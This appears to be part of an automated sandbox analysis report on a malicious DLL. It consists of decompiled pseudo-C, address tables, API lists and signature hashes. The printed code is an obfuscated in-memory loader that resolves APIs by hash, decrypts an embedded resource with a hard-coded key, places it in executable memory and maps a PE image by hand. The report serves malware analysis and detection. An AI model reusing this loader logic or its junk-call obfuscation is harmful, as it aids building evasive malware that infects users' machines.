						 *((short*)(_t330 + 0x56 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x74;
						 *((short*)(_t330 + 0x58 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x5a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x64;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						_v92 = E10001534(_t314, _t337, 0x28b4cee6, 0x31c6c0a1, 0x628ad09, 0x1a322e2e, 0x3801a8f2,  &_v32);
						_v84 = E10001534(_t314, _t337, 0x3446e98c, 0x348b2998, 0x118db97f, 0x2d34cc91, 0x1c9cdc39,  &_v76);
						_v88 = E10001534(_t314, _t337, 0x106d66fc, 0x108d4cdc, 0x156af904, 0x20e23fe3, 0xe094f82,  &_v56);
						 *0x10046a74 = E10001688(_t254, 0x4cba7001);
						 *0x10046a70 = E10001688(_v88, 0x4e026ffd);
						 *0x10046a64 = E10001688(_v88, 0xc066615c);
						 *0x10046a54 = E10001688(_v88, 0xdad370ab);
						 *0x10046a68 = E10001688(_v88, 0x3762b189);
						 *0x10046a80 = E10001688(_v88, 0x4ec2add7);
						 *0x10046a2c = E10001688(_v88, 0x4e6ab1d2);
						 *0x10046a30 = E10001688(_v92, 0x626d0ab3);
						 *0x10046a3c = E10001688(_v92, 0x491ca2f6);
						 *0x10046a58 = E10001688(_v92, 0x74860909);
						 *0x10046a50 = E10001688(_v92, 0x13c17412);
						 *0x10046a4c = E10001688(_v92, 0x4a42047a);
						 *0x10046a5c = E10001688(_v92, 0x4d093b11);
						 *0x10046a84 = E10001688(_v92, 0x1f051606);
						 *0x10046a40 = E10001688(_v92, 0xdd86ddbc);
						 *0x10046a38 = E10001688(_v84, 0x3ed46385);
						 *0x10046a7c = E10001688(_v92, 0x417f6a7d);
						 *0x10046a78 = E10001688(_v92, 0xb88a2b15);
						 *0x10046a60 = E10001688(_v92, 0x3fbe89a1);
						 *0x10046a34 = E10001688(_v92, 0xbcc9930d);
						 *0x10046a6c = E10001688(_v92, 0x2c4bdae9);
						 *0x10046a48 = E10001688(_v92, 0x640963da);
						_t277 = E10001688(_v92, 0xfa5d867);
						_t334 = _t330 + 0x100;
						 *0x10046a44 = _t277; // executed
						_t278 = FindResourceW(_v80, 0x3275, 0x10036c5c); // executed
						_v84 = _t278;
						_v92 = LoadResource(_v80, _t278);
						_t280 = SizeofResource(_v80, _v84);
						_push(0x22b9);
						_push(_t326);
						_v88 = _t280;
						_t338 =  *0x10046a3c; // 0x76d866e0
						_push(0);
						_push(_t312);
						_push(0x11d4);
						_push(0);
						if(_t338 == 0) {
							_v84 = GetCurrencyFormatW() *  *0x100440d0 + 0x2000;
							_t285 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9);
							_t291 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84;
							__eflags = _t291;
							_t292 = VirtualAlloc(0, _v88, _t291, _t285 *  *0x100440cc + 0x40);
						} else {
							_v84 = GetCurrencyFormatW() *  *0x100440e0 + 0x2000;
							_t292 =  *0x10046a3c(0xffffffff, 0, _v88, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 + 0x40, 0); // executed
						}
						_t313 = _v88;
						_t324 = _t292;
						memcpy(_t292, _v92, _v88);
						_t294 = malloc(0x4708); // executed
						_t321 = _t294;
						E100018D8(0xed9e0cf, 0x96c3a441, 0x245e78a3, _t321, "u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m(", 0x3f);
						E10001B36(0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t321, _t292, _v88);
						 *0x10046a64(_t321);
						_t298 = E100042CA(_t324, _t313);
						_t330 = _t334 + 0x4c;
						 *0x10046a8c = _t298;
						 *0x10046a88(_v80);
						_pop(_t319);
						_t322 = 1;
						_t311 = 0;
						goto L6;
					}
				}
				return E1001FBB5(_t183, _t311, _v4 ^ _t330, _t318, _t319, _t322);
			}




























































                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f9
                                                                                                            0x10004300
                                                                                                            0x10004308
                                                                                                            0x10004310
                                                                                                            0x10004311
                                                                                                            0x10004b56
                                                                                                            0x10004b58
                                                                                                            0x10004317
                                                                                                            0x10004317
                                                                                                            0x1000431c
                                                                                                            0x1000431e
                                                                                                            0x10004b5b
                                                                                                            0x10004b60
                                                                                                            0x10004b66
                                                                                                            0x10004b66
                                                                                                            0x10004324
                                                                                                            0x10004324
                                                                                                            0x10004325
                                                                                                            0x10004326
                                                                                                            0x1000432d
                                                                                                            0x10004333
                                                                                                            0x1000433a
                                                                                                            0x10004347
                                                                                                            0x1000434c
                                                                                                            0x10004351
                                                                                                            0x10004356
                                                                                                            0x1000435b
                                                                                                            0x10004360
                                                                                                            0x10004365
                                                                                                            0x1000436a
                                                                                                            0x10004371
                                                                                                            0x10004378
                                                                                                            0x1000437f
                                                                                                            0x10004386
                                                                                                            0x1000438d
                                                                                                            0x10004394
                                                                                                            0x1000439b
                                                                                                            0x100043a2
                                                                                                            0x100043a9
                                                                                                            0x100043b0
                                                                                                            0x100043b7
                                                                                                            0x100043be
                                                                                                            0x100043c3
                                                                                                            0x100043ca
                                                                                                            0x100043d1
                                                                                                            0x100043d8
                                                                                                            0x100043df
                                                                                                            0x100043e6
                                                                                                            0x100043ed
                                                                                                            0x100043f4
                                                                                                            0x100043fb
                                                                                                            0x10004402
                                                                                                            0x10004407
                                                                                                            0x1000440e
                                                                                                            0x10004415
                                                                                                            0x1000441c
                                                                                                            0x10004423
                                                                                                            0x1000442a
                                                                                                            0x10004431
                                                                                                            0x10004438
                                                                                                            0x1000443f
                                                                                                            0x10004446
                                                                                                            0x1000444d
                                                                                                            0x10004467
                                                                                                            0x10004483
                                                                                                            0x1000449c
                                                                                                            0x100044bb
                                                                                                            0x100044d7
                                                                                                            0x100044f3
                                                                                                            0x1000450f
                                                                                                            0x1000452b
                                                                                                            0x10004547
                                                                                                            0x10004563
                                                                                                            0x1000457f
                                                                                                            0x10004598
                                                                                                            0x100045b7
                                                                                                            0x100045d3
                                                                                                            0x100045ef
                                                                                                            0x1000460b
                                                                                                            0x10004627
                                                                                                            0x10004643
                                                                                                            0x1000465f
                                                                                                            0x1000467b
                                                                                                            0x10004694
                                                                                                            0x100046b3
                                                                                                            0x100046cf
                                                                                                            0x100046eb
                                                                                                            0x10004707
                                                                                                            0x10004723
                                                                                                            0x1000473f
                                                                                                            0x1000475b
                                                                                                            0x10004777
                                                                                                            0x10004790
                                                                                                            0x100047a3
                                                                                                            0x100047cd
                                                                                                            0x100047f4
                                                                                                            0x10004824
                                                                                                            0x10004836
                                                                                                            0x10004849
                                                                                                            0x1000485c
                                                                                                            0x1000486f
                                                                                                            0x10004882
                                                                                                            0x10004895
                                                                                                            0x100048a8
                                                                                                            0x100048be
                                                                                                            0x100048d1
                                                                                                            0x100048e4
                                                                                                            0x100048f7
                                                                                                            0x10004901
                                                                                                            0x1000491d
                                                                                                            0x10004930
                                                                                                            0x10004943
                                                                                                            0x10004959
                                                                                                            0x1000496c
                                                                                                            0x1000497f
                                                                                                            0x10004992
                                                                                                            0x100049a5
                                                                                                            0x100049b8
                                                                                                            0x100049cb
                                                                                                            0x100049d0
                                                                                                            0x100049d5
                                                                                                            0x100049e6
                                                                                                            0x100049eb
                                                                                                            0x100049f6
                                                                                                            0x10004a04
                                                                                                            0x10004a0c
                                                                                                            0x10004a12
                                                                                                            0x10004a17
                                                                                                            0x10004a18
                                                                                                            0x10004a1e
                                                                                                            0x10004a24
                                                                                                            0x10004a25
                                                                                                            0x10004a26
                                                                                                            0x10004a27
                                                                                                            0x10004a28
                                                                                                            0x10004a9e
                                                                                                            0x10004aa2
                                                                                                            0x10004ac9
                                                                                                            0x10004ac9
                                                                                                            0x10004ad3
                                                                                                            0x10004a2a
                                                                                                            0x10004a38
                                                                                                            0x10004a7c
                                                                                                            0x10004a7c
                                                                                                            0x10004ad9
                                                                                                            0x10004ae2
                                                                                                            0x10004ae5
                                                                                                            0x10004af0
                                                                                                            0x10004afd
                                                                                                            0x10004b0f
                                                                                                            0x10004b26
                                                                                                            0x10004b2f
                                                                                                            0x10004b37
                                                                                                            0x10004b3c
                                                                                                            0x10004b47
                                                                                                            0x10004b4c
                                                                                                            0x10004b52
                                                                                                            0x10004b53
                                                                                                            0x10004b55
                                                                                                            0x00000000
                                                                                                            0x10004b55
                                                                                                            0x1000431e
                                                                                                            0x10004b76

                                                                                                            APIs
                                                                                                              • Part of subcall function 100036FA: _malloc.LIBCMT ref: 10003700
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004452
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000446E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000448A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100044A6
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100044C2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100044DE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100044FA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004516
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004532
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000454E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000456A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004586
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100045A2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100045BE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100045DA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100045F6
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004612
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000462E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000464A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004666
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004682
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000469E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100046BA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100046D6
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100046F2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000470E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000472A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004746
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004762
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000477E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000479A
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 1000155F
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015B5
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015DF
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001606
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001639
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001668
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016B0
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016D0
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016E8
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001710
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001731
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001757
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001770
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 1000179B
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017B7
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017DF
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017FA
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001826
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001844
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001879
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001899
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100018BE
                                                                                                            • FindResourceW.KERNELBASE(?,00003275,10036C5C), ref: 100049EB
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100049FA
                                                                                                            • SizeofResource.KERNEL32(?,?), ref: 10004A0C
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004A2A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004A49
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004A62
                                                                                                            • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,?,?), ref: 10004A7C
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004A84
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004AA2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004ABB
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,?), ref: 10004AD3
                                                                                                            • memcpy.MSVCRT ref: 10004AE5
                                                                                                            • malloc.MSVCRT ref: 10004AF0
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004B2F
                                                                                                            • _printf.LIBCMT ref: 10004B60
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$Resource$AllocVirtual$??3@FindLoadNumaSizeof_malloc_printfmallocmemcpy
                                                                                                            • String ID: .$.$.$3$c$d$d$d$d$e$e$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$k$l$l$l$l$l$l$l$m$n$n$r$s$t$t$u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m($v$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3325861097-4060776750
                                                                                                            • Opcode ID: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
                                                                                                            • Instruction ID: abf1217519c19ffa8c1e819e0abff0726c6fc8cdfe709489ff9e1ea74d27783b
                                                                                                            • Opcode Fuzzy Hash: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
                                                                                                            • Instruction Fuzzy Hash: 8922A074544314BAF315DB91CE8AF0BBBECEF8A744F015509F740AA2A0D772A5248F6B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100039A9 Relevance: 111.0, APIs: 60, Strings: 3, Instructions: 767COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 74 100039a9-10003a05 GetCurrencyFormatW * 2 call 10001e20 77 10003a07-10003a09 74->77 78 10003a0e-10003a31 GetCurrencyFormatW 74->78 79 10004247-1000424e 77->79 78->77 80 10003a33-10003a7a GetCurrencyFormatW * 2 call 10001e20 78->80 80->77 83 10003a7c-10003abe GetCurrencyFormatW * 2 80->83 83->77 84 10003ac4-10003ae8 GetCurrencyFormatW 83->84 84->77 85 10003aee-10003b0b GetCurrencyFormatW 84->85 85->77 86 10003b11-10003b67 GetCurrencyFormatW * 2 85->86 87 10003c26-10003cf4 GetCurrencyFormatW GetNativeSystemInfo GetCurrencyFormatW * 2 call 10001de9 GetCurrencyFormatW * 3 call 10001de9 86->87 88 10003b6d-10003b74 86->88 87->77 99 10003cfa-10003d87 GetCurrencyFormatW * 4 87->99 90 10003b78-10003b8b 88->90 92 10003ba2-10003bb1 GetCurrencyFormatW 90->92 93 10003b8d-10003ba0 GetCurrencyFormatW 90->93 95 10003bb4-10003bd5 GetCurrencyFormatW 92->95 93->95 97 10003bf4-10003c20 GetCurrencyFormatW 95->97 98 10003bd7-10003bf0 GetCurrencyFormatW 95->98 97->87 97->90 98->97 101 10003e14-10003e7b GetCurrencyFormatW * 2 GetProcessHeap HeapAlloc GetCurrencyFormatW 99->101 102 10003d8d-10003e0e GetCurrencyFormatW * 4 99->102 103 10003ead-10003f72 GetCurrencyFormatW * 4 call 10001e20 101->103 104 10003e7d-10003ea8 GetCurrencyFormatW 101->104 102->77 102->101 109 100041d1-100041db call 10003567 103->109 110 10003f78-100040be GetCurrencyFormatW * 4 memcpy GetCurrencyFormatW * 5 call 10001e51 103->110 104->77 109->77 110->109 116 100040c4-100040ed GetCurrencyFormatW 110->116 117 10004155 116->117 118 100040ef-10004153 GetCurrencyFormatW * 2 call 1000290c GetCurrencyFormatW 116->118 120 1000415c-10004181 GetCurrencyFormatW call 10002bde 117->120 118->120 120->109 124 10004183-100041a0 GetCurrencyFormatW call 10002482 120->124 126 100041a5-100041a8 124->126 126->109 127 100041aa-100041cf GetCurrencyFormatW call 10002863 126->127 127->109 130 100041e0-100041eb 127->130 131 10004244 130->131 132 100041ed-100041fa 130->132 131->79 133 10004223-1000423b GetCurrencyFormatW 132->133 134 100041fc-10004221 GetCurrencyFormatW 132->134 135 1000423e-10004242 133->135 134->135 135->79
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E100039A9(void* __eflags, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* _v0;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				int _v48;
				intOrPtr* _v52;
				int _v56;
				int _v60;
				intOrPtr* _v64;
				void* __esi;
				signed int _t155;
				signed int _t166;
				signed int _t186;
				int _t187;
				signed int _t193;
				signed int _t198;
				void* _t202;
				signed int _t205;
				signed int _t210;
				int _t223;
				signed int _t224;
				signed int _t227;
				intOrPtr* _t234;
				signed int _t235;
				intOrPtr _t238;
				signed int _t242;
				signed int _t275;
				signed int _t283;
				signed short* _t286;
				intOrPtr* _t302;
				signed int _t306;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t323;
				int _t336;
				int _t343;
				intOrPtr* _t407;
				short* _t447;
				int* _t448;
				int* _t449;

				_t448 =  &_v60;
				_t447 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v44 = 0;
				_t155 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t155 *  *0x100440d0 + 0x40) != 0) {
					if(( *_a4 & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x5a4d) {
						goto L1;
					}
					_t166 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
					if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t166 *  *0x100440d8 + _a4[0x1e] + 0xf8) == 0) {
						goto L1;
					}
					_v56 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _a4[0x1e];
					if( *_v56 != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x4550 || ( *(_v56 + 4) & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x14c || ( *(_v56 + 0x38) & GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000001) != 0) {
						goto L1;
					} else {
						_t186 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t187 = _v56;
						_v40 =  *((intOrPtr*)(_t187 + 0x38));
						_v52 = ( *(_t187 + 0x14) & 0x0000ffff) + _t186 *  *0x100440d8 * 0x28 + _t187 + 0x18;
						_v48 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff) == 0) {
							L15:
							_t193 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							 *0x10046a40(); // executed
							_t198 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t202 = E10001DE9(_t198 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v60 + 0x50)));
							 *_t448 = 0x22b9;
							_v52 = _t202 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", _t448 + 0x28 + _t193 *  *0x100440d8 * 0x24) *  *0x100440d8;
							_t205 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							if(_v52 != E10001DE9(_t205 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v48)) {
								goto L1;
							}
							_t210 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t210 *  *0x100440d4 + 0x2000;
							_t223 = _a8(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x34)), _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
							_t449 =  &(_t448[5]);
							_v56 = _t223;
							if(_t223 != 0) {
								L18:
								_t224 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_t227 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_v44 = HeapAlloc(GetProcessHeap(), _t227 *  *0x100440dc + 8, _t224 *  *0x100440d0 + 0x40);
								_t234 = _v44 + (GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6);
								_v64 = _t234;
								if(_t234 != 0) {
									 *((intOrPtr*)(_t234 + 4)) = _v56;
									_t235 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t238 = _v64;
									asm("sbb ecx, ecx");
									 *(_t238 + 0x14) =  ~( ~(_t235 *  *0x100440dc + 0x00002000 &  *(_v60 + 0x16) & 0x0000ffff));
									 *((intOrPtr*)(_t238 + 0x1c)) = _a8;
									 *((intOrPtr*)(_t238 + 0x20)) = _a12;
									 *((intOrPtr*)(_t238 + 0x24)) = _a16;
									 *((intOrPtr*)(_t238 + 0x28)) = _a20;
									 *((intOrPtr*)(_t238 + 0x2c)) = _a24;
									 *((intOrPtr*)(_t238 + 0x34)) = _a28;
									 *((intOrPtr*)(_v64 + 0x3c)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _v36;
									_t242 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E20(_a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _t242 *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54))) == 0) {
										L28:
										E10003567(_v64);
										goto L1;
									}
									_v48 = _a8(_v56, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54)), GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
									memcpy(_v48, _v0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x54)));
									_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 0xf8;
									 *_v64 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _v44 + _v48 +  *((intOrPtr*)(_v0 + 0x3c));
									 *((intOrPtr*)( *_v64 + 0x34)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v56;
									_t275 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E51(_v0, _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _v60, (_t275 *  *0x100440d0 << 6) + _v64) == 0) {
										goto L28;
									}
									_t283 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t407 = _v64;
									_t286 = _t283 *  *0x100440cc +  *((intOrPtr*)( *_t407 + 0x34)) -  *((intOrPtr*)(_v60 + 0x34));
									_a4 = _t286;
									if(_t286 == 0) {
										 *((intOrPtr*)(_t407 + 0x18)) = 1;
									} else {
										_t308 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
										_a4 = E1000290C((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64, _a4 + _t308 *  *0x100440d8);
										 *((intOrPtr*)(_v64 + 0x18)) = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0;
									}
									if(E10002BDE((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0 || E10002482((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64) == 0 || E10002863((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0) {
										goto L28;
									} else {
										_t302 = _v64;
